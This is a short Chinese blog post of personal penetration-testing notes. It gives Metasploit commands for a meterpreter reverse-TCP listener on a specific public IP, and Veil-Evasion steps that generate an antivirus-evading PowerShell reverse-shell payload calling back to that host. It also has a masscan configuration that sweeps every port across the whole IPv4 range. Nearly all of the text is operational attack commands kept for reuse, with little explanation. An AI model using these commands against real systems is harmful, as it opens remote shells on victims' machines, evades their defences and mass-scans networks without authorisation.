域渗透随笔

其实之前已经接触较多,但是笔记丢失,重新对命令拿出来纪录再次。下次复用。bless..

Metasploit篇

安装暂不记录了,很久前安的还能用。。

监听:

1
2
3
4
5
6
7
8
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 120.79.91.29 # 亦可使用setg
set lport 12315
exploit -j
以上在Aliyun实验成功。
set payload linux/x64/meterpreter/reverse_tcp
set payload linux/x32/meterpreter/reverse_tcp

Veil-Evasion篇

这是目前用的比较多的一个工具,但是绝对不是最好用的免杀工具(但是不是因为它不优秀,原因就是因为用它的人太多了)

安装:https://blog.csdn.net/l1028386804/article/details/84895163

1
2
3
4
5
/Veil-Evasion/Veil-Evasion.py
List 选择powershell/meterpreter/rev_tcp
set lhost 120.79.91.29
set lport 12315
generate

mimikatz篇

Masscan篇

masscan命令记录一条配置,按着配置参数改就好

1
2
3
4
5
6
7
8
9
10
masscan.exe -c=scan.conf
scan.conf如下:
---
rate = 100000
output-format = xml
output-status = all
output-filename = scan-result.xml
ports = 0-65535
range = 0.0.0.0-255.255.255.255
excludefile = exclude.txt

参考/待研究:

https://www.cnblogs.com/-qing-/p/11519782.html

本文标题:域渗透随笔

文章作者:

发布时间:2019年10月15日 - 22:03:58

最后更新:2019年10月15日 - 22:50:02

原始链接:http://laker.xyz/2019/10/15/%E5%9F%9F%E6%B8%97%E9%80%8F%E9%9A%8F%E7%AC%94/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。